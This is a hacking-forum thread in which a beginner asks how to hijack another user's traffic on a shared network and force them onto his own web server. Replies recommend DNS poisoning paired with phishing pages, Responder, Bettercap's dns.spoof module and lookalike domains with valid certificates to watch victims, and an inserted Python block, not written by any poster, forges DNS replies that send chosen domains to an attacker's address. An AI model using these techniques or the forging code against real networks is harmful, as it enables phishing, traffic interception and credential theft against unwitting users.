[QUESTION] How would you go about forcing a user on a network onto a web page?
#1
Hello! I've taken up hacking and of course I have many burning questions that I haven't figured out how to answer on my own.
I've learned about ARP Spoofing/Poisoning where an attacker can proxy traffic from a victim through their machine.
I'm curious if you could do some form of ARP poisoning that changes the DNS outcome of a website to an attacker machine's port, and how one could manage that.

If my question wasn't clear, here's a scenario below:
Bob is a hacker that wants to force Alice, a casual user of a shared network, onto his website. Bob has a web server running on his machine and wants Alice to visit the page. How would Bob redirect Alice to his web server instead of the web server Alice wants to visit? (I'm assuming this has to be done with some form of ARP spoofing and modifying DNS)

Thanks for all the help!
#2
(01-19-2021, 10:57 PM)ueax Wrote: I'm curious if you could do some form of ARP poisoning that either changes the DNS out come of a website to an attacker machine's port and how one could manage that.

This is possible, it's called DNS Poisoning. I don't have everything in my head right now but it works pretty similar to ARP poisoning. You set up your own records (e.g. facebook.com and point it to an IP of your own; a good idea would be to locally host a phishing page made by SET - Social Engineering Toolkit, and redirect domain requests to your local webserver with the phishing page). Although much more can be done.

Found a pretty good article that explains some of it: https://www.tutorialspoint.com/ethical_h...soning.htm

(01-19-2021, 10:57 PM)ueax Wrote: If my question wasn't clear, here's a scenario below:

Bob is a hacker that wants to force Alice, a casual user of a shared network, onto his website. Bob has a web server running on his machine and wants Alice to visit the page. How would Bob redirect Alice to his web server instead of the web server Alice wants to visit? (I'm assuming this has to be done with some form of ARP spoofing and modifying DNS)

Thanks for all the help!

Besides the point I made above: catch the DNS requests with your local fake DNS server, and return your own IPs/destinations. If you want to force a user onto a web page no matter what, that should be possible too. If you've ever connected to public wifi, many of them have gateway pages where you have to accept terms, create accounts etc. And you will be automatically redirected to it if you haven't gone through it yet.

For that you would probably need access to the router, and enable forced auth to a gateway or similar. Like: https://serverfault.com/questions/276014...b-site-hos
#3
Thanks a lot! I'll check those all out.
#4
Is it a Windows user? What would happen if you tossed a .html file in his startup dir?
#5
Interesting coincidence. I am currently designing (and then will code) an application that will do exactly this. It uses ARP poisoning to send all traffic for the target through the attacker machine. It will then sniff all the data for DNS queries, and if it detects one, it will respond back to the requestor with a response of the attacker's choosing.
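The packet-level step post #5 describes (sniff a DNS query, answer it with an address of the attacker's choosing), as an added example that is not code from the thread or from the poster's application. It parses a raw DNS query payload exactly as an on-path attacker would see it after ARP poisoning and, only for names on a target list, builds a forged A-record response that reuses the victim's transaction ID and question section. The transport side (ARP spoofing, capturing the UDP datagram, sending the forged reply back to the victim's source port) is deliberately left out; `ATTACKER_IP`, `SPOOF_DOMAINS` and the sample query are assumptions constructed for the demo.

```python
"""Forge a DNS A-record reply for a sniffed query (added example, not from the thread).

Assumptions: ATTACKER_IP is Bob's web server; SPOOF_DOMAINS are the names to hijack.
The query used as sample input is built locally by build_query(); nothing here
touches the network.
"""
import ipaddress
import struct

ATTACKER_IP = "192.168.1.66"          # assumed: address of the attacker's web server
SPOOF_DOMAINS = {"www.example.com"}   # assumed: names whose lookups get hijacked

QTYPE_A = 1
QCLASS_IN = 1


def build_query(qname, txid=0x1234):
    """Construct a standard recursive A query; used only to make sample input."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, one question
    name = b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in qname.split(".")) + b"\x00"
    return header + name + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def parse_query(pkt):
    """Return (txid, qname, qtype, qclass, question_bytes) or None if not a usable query."""
    if len(pkt) < 12:
        return None
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000:            # QR bit set: this is a response, ignore it
        return None
    if qdcount != 1:              # only handle the common single-question case
        return None
    labels = []
    off = 12
    while True:
        length = pkt[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0:         # compression pointer: not expected in a query's only name
            return None
        labels.append(pkt[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return txid, ".".join(labels), qtype, qclass, pkt[12:off + 4]


def forge_response(query_pkt, answer_ip=ATTACKER_IP, ttl=60):
    """Build a spoofed reply for an IN/A query on a target name; None for anything else.

    The reply copies the victim's transaction ID and question section verbatim, which
    is what makes the resolver on the victim accept it as the answer to its question.
    """
    parsed = parse_query(query_pkt)
    if parsed is None:
        return None
    txid, qname, qtype, qclass, question = parsed
    if qtype != QTYPE_A or qclass != QCLASS_IN or qname.lower() not in SPOOF_DOMAINS:
        return None
    # flags 0x8580: QR=1 (response), AA=1, RD=1, RA=1, rcode=0 (NOERROR)
    header = struct.pack("!HHHHHH", txid, 0x8580, 1, 1, 0, 0)
    # answer RR: name = pointer to offset 12 (the question name), type A, class IN,
    # TTL, rdlength 4, then the attacker's IPv4 address as rdata
    answer = (struct.pack("!HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4)
              + ipaddress.IPv4Address(answer_ip).packed)
    return header + question + answer


def answer_ip(resp):
    """Read back the A-record address from a response built by forge_response."""
    return str(ipaddress.IPv4Address(resp[-4:]))


if __name__ == "__main__":
    sniffed = build_query("www.example.com")      # constructed sample, stands in for a captured query
    reply = forge_response(sniffed)
    print("forged reply:", reply.hex())
    print("victim will resolve www.example.com to", answer_ip(reply))
```

Two practical points the code does not cover: the forged reply must reach the victim before the legitimate resolver's answer does (an on-path attacker usually drops or never forwards the real query, so there is no race), and modern clients will still refuse an HTTPS connection to the attacker's server because the certificate does not match the spoofed name, which is the caveat post #7 raises.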
#6
Since a lot of technical information has already been provided, I figured I'd point out that a tool by the name of Responder might be the kind of thing you are looking for, OP.

The repo says deprecated, but most pentesting distros still support Python 2 implementations. So if you want to check it out you can find it by clicking here

Also, it should be pretty straightforward to set up a Dockerfile to deploy Responder. That way, you don't have to worry about dependency issues either.
#7
Some great replies already in this thread! There's also a good number of tools out there that can do what you want (get your target to use your poisoned DNS server). Bettercap is my personal fav - you can use the `dns.spoof` module to achieve your goal: https://www.bettercap.org/modules/ethern...dns.spoof/

One thing to keep in mind is that you _won't_ be able to spoof the HTTPS certs. This would require you to either have access to their machine, or trick them into installing your CA as a trusted CA on their box.

An alternative is to register lookalike domains and get valid TLS certs for those domains, and have your target be redirected to those domains. This way, they'll still get all the HTTPS goodness they expect, the domain looks kinda sorta like the domain they're expecting to see (or maybe they don't see the full domain at all? Thanks, Chrome!), and you get to see what they're up to. Everybody wins.